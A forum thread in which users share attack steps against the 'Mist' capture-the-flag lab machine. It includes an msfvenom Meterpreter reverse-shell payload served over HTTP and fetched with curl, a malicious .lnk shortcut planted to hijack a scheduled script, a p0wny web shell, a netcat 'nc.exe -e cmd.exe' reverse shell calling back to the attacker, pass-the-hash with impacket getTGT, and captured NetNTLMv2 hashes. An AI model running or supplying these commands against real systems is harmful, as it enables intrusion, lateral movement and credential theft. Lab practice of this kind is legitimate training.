Posts: 2
Threads: 0
Joined: Apr 2024
(Apr 01, 2024, 03:45 AM)3kyy Wrote: (Mar 31, 2024, 10:28 PM)fl00d777 Wrote: (Mar 31, 2024, 11:56 AM)gtastav Wrote: For brandon:
$source = "C:\Users\Brandon.Keywarp\AppData\links"
$destination = "C:\Common Applications"
$sourceFiles = Get-ChildItem -Path $source -Filter *.lnk
foreach ($file in $sourceFiles) {
$sourceFile = $file.FullName
$destFile = Join-Path -Path $destination -ChildPath $file.Name
if (Test-Path -Path $destFile) {
$sHash = (Get-FileHash -Path $sourceFile -Algorithm SHA256).Hash
$dHash = (Get-FileHash -Path $destFile -Algorithm SHA256).Hash
write-host $sHash
write-host $dHash
if ($sHash -ne $dHash) {
Invoke-Item $destFile
start-sleep -seconds 5
}
}
}
Means you can upload a crafted .lnk file(to the directory in the code above) to trigger a shell and to get the shell as brandon.
Where did you learn this from?
Its link.ps1, when you put "type link.ps1"
![[Image: Captura-de-pantalla-2024-04-01-003936.png]](https://i.ibb.co/bLWLrzt/Captura-de-pantalla-2024-04-01-003936.png)
and yes, this is how we can move to Brandon user...
msfvenom -p windows/x64/meterpreter/reverse_Tcp LHOST=tun0 LPORT=6666 -f exe -o 6666.exe
python3 -m http.server 8888
from htdocs/shell.php run
curl 10.10.14.x:8888/6666.exe -o 6666.exe
then powershell and execute this:
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Notepad.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\6666.exe"
$lnk.Save()
this going to create a shortcut to Common Applications. So the user Brandon "wil click the shortcut" and you can obtain Brandon shell.
Ok but how you read this file in Baron directory being on svc_web acccount? I get access denied, there is any trick?
Posts: 96
Threads: 2
Joined: Feb 2024
Hi,
Did anyone get the relaying working with ntlmrelayx and petitpotam.py?
Care to share?
Posts: 28
Threads: 0
Joined: Jan 2024
with the winpeas resource I found this hash from Brandon, has anyone tried to crack it??
I'm stuck here and I don't know how to move forward
If anyone can help, I appreciate it
HASH de bBrandon = Version: NetNTLMv2
Hash: Brandon.Keywarp::MIST:1122334455667788:65577ca8f5f7c492f3eb50de678b1922:01010000000000001bea24efe684da017822a14f9161bff00000000008003000300000000000000000000000002000005f523428045377d67a93f9f63357e2f6835903ffb211afcd4982c4efec0113800a00100000000000000000000000000000000000090000000000000000000000 This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 1
Threads: 0
Joined: Apr 2024
Could anyone please share how to gain MS01$ hash from the Brandon user? I understand the lateral movement afterwards but nothing is working for this hash?
Posts: 2
Threads: 0
Joined: Apr 2024
(Apr 01, 2024, 03:45 AM)3kyy Wrote: (Mar 31, 2024, 10:28 PM)fl00d777 Wrote: (Mar 31, 2024, 11:56 AM)gtastav Wrote: For brandon:
$source = "C:\Users\Brandon.Keywarp\AppData\links"
$destination = "C:\Common Applications"
$sourceFiles = Get-ChildItem -Path $source -Filter *.lnk
foreach ($file in $sourceFiles) {
$sourceFile = $file.FullName
$destFile = Join-Path -Path $destination -ChildPath $file.Name
if (Test-Path -Path $destFile) {
$sHash = (Get-FileHash -Path $sourceFile -Algorithm SHA256).Hash
$dHash = (Get-FileHash -Path $destFile -Algorithm SHA256).Hash
write-host $sHash
write-host $dHash
if ($sHash -ne $dHash) {
Invoke-Item $destFile
start-sleep -seconds 5
}
}
}
Means you can upload a crafted .lnk file(to the directory in the code above) to trigger a shell and to get the shell as brandon.
Where did you learn this from?
Its link.ps1, when you put "type link.ps1"
and yes, this is how we can move to Brandon user...
msfvenom -p windows/x64/meterpreter/reverse_Tcp LHOST=tun0 LPORT=6666 -f exe -o 6666.exe
python3 -m http.server 8888
from htdocs/shell.php run
curl 10.10.14.x:8888/6666.exe -o 6666.exe
then powershell and execute this:
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Notepad.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\6666.exe"
$lnk.Save()
this going to create a shortcut to Common Applications. So the user Brandon "wil click the shortcut" and you can obtain Brandon shell.
Any advise for Brandon shell? Both meterpreter and clasic tcp shell disconnects as soon as the connection is established. I try same method us before for svc_web but is dosnt work. Any hint?
Posts: 124
Threads: 1
Joined: Apr 2024
Apr 02, 2024, 04:48 PM
(This post was last modified: Apr 02, 2024, 05:03 PM by jsvensson.)
I got ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how with that get hash for local admin for ms01?
(Apr 02, 2024, 04:48 PM)jsvensson Wrote: I got ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how with that get hash for local admin for ms01?
never mind already done 
(Apr 02, 2024, 04:48 PM)jsvensson Wrote: I got ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how with that get hash for local admin for ms01?
never mind already done
Posts: 16
Threads: 3
Joined: Apr 2024
(Apr 02, 2024, 04:48 PM)jsvensson Wrote: I got ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how with that get hash for local admin for ms01?
(Apr 02, 2024, 04:48 PM)jsvensson Wrote: I got ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how with that get hash for local admin for ms01?
never mind already done
(Apr 02, 2024, 04:48 PM)jsvensson Wrote: I got ticket from impacket-getTGT mist.htb/ms01$ -hashes :4a74fc05400345d580cf58aec3e6d833 -dc-ip 192.168.100.100
but how with that get hash for local admin for ms01?
never mind already done
Any hint on what you did after getTGT? Ticket from getTGT doesn't seem to work with ps/smb/wmiexec
Posts: 26
Threads: 0
Joined: Apr 2024
how do you get the mashine hash?
I have a shell for brendon and svc_web + ntlm hashes of both This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 40
Threads: 2
Joined: Jan 2024
(Mar 31, 2024, 02:58 AM)osamy7592 Wrote: (Mar 31, 2024, 02:46 AM)iNone Wrote: (Mar 31, 2024, 02:42 AM)osamy7592 Wrote: After gaining a shell and becoming svc user .. What is the next step any hint ?
How you get the shell? you import the module but what shell you use and how I can bypass the av? because the shell kick me
Ok guys get a pownyshell from here : https://github.com/flozz/p0wny-shell/blo.../shell.php
After that go to http://mist.htb/data/modules .... And so on after y get shell.php click on it ok
Now u have a shell .. U can forward it to ur kali .. Firstly download on kali nc64.exe after that set a web
Server python -m http.server and from powny shell write curl http://kali ip:port/nc64.exe -o nc.exe
Now set nc -nlvp 4444 and from powny shell write nc.exe kali ip 4444 -e cmd.exe now u have a shell on ur kali
So any hint after gaining the shell ? After I gaining p0wnyshell , I add the curl command to download the nc64.exe and shell dies at the moment
what other payload can I get to get shell as ms01\svc_web. Any shortcut? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 6
Threads: 0
Joined: Feb 2024
Got This hash, cant crack him dont know how to continue from this point
svc_web::MS01:1122334455667788:2a1beddd69c71ca052428592e5d3cbb9:010100000000000069fbc8c3c283da01fecd0ddc57a9967c0000000008003000300000000000000000000000003000005244af53b397216e69d27c37edb6b316715fda182a087e1bf2499435508a5ba60a00100000000000000000000000000000000000090000000000000000000000
|
